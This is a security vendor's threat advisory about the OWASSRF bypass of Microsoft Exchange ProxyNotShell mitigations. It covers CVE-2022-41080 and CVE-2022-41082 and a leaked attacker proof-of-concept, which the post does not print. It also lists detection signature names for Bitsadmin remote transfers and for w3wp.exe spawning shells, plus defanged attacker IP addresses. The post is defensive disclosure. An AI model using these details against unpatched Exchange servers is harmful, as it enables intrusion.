New Exchange Exploits Exploited in the Wild

December 22, 2022 by Bryson Medlock

Microsoft Exchange has received a lot of attention over the past couple of years due to a number of remote code execution (RCE) vulnerabilities specifically targeting the way Microsoft’s Internet Information Services (IIS) proxies traffic to the Microsoft Exchange back end (here, here, here, and here). News came out this week regarding a new method of exploiting Exchange that will bypass Microsoft’s recommended mitigations for ProxyNotShell (CVE-2022-41040 and CVE-2022-41082). Specifically, this new exploit bypasses the URL rewrite mitigation guidance from Microsoft we shared back in September; however, the bypass is only for this mitigation and will not work if your systems are patched with November 8, 2022 patch KB5019758.

This latest exploit, dubbed OWASSRF, was disclosed earlier this week by CrowdStrike. The original ProxyNotShell vulnerability starts with CVE-2022-41040, a server-side request forger (SSRF) targeting Exchange’s Autodiscover endpoint, which would allow an attacker to access arbitrary URLs in the back end. Then an CVE-2022-41082, an authenticated RCE vulnerability in Exchange can be used to execute arbitrary PowerShell commands. The new method targets a previously undisclosed vulnerability in the Outlook Web Access (OWA) frontend endpoint, instead of the Autodiscover endpoint. The previous URL redirect mitigation guidance from Microsoft only applied to the Autodiscover endpoint.

Security Researcher Dray Agha discovered an attacker’s open repository earlier this month, downloaded their tools, and made them available for download via Twitter. A leaked Python script, “poc.py”, was included in the leaked tools and gives us insight into the related vulnerability. Based on the leaked tool, the latest exploit observed in the wild appears to be related to CVE-2022-41080 which was patched in November.

exchange_poy_py.jpeg

Detection

The CRU has been actively hunting based on the information available and will continue to do so. Many of the TTPs observed in this attack are not new and existing CRU detection signatures already exist for our partners that will detect related post-comp activity. Partners using the CW SIEM who are sending us logs from their Exchange servers will find the following detection signatures in the CRU Collection:

            [CRU][Windows] Bitsadmin transfer from remote server

            [CRU][Windows] Suspicious w3wp.exe running as parent to powershell or cmd that is running child command processes

We’ve also added the following new signature specifically for CVE-2022-41080:

            [CRU][Filebeat] Potential CVE-2022-41080 Exchange Privilege Escalation Exploit

 

IOCS

45.76.141[.]84

45.76.143[.]143

179.60.149[.]28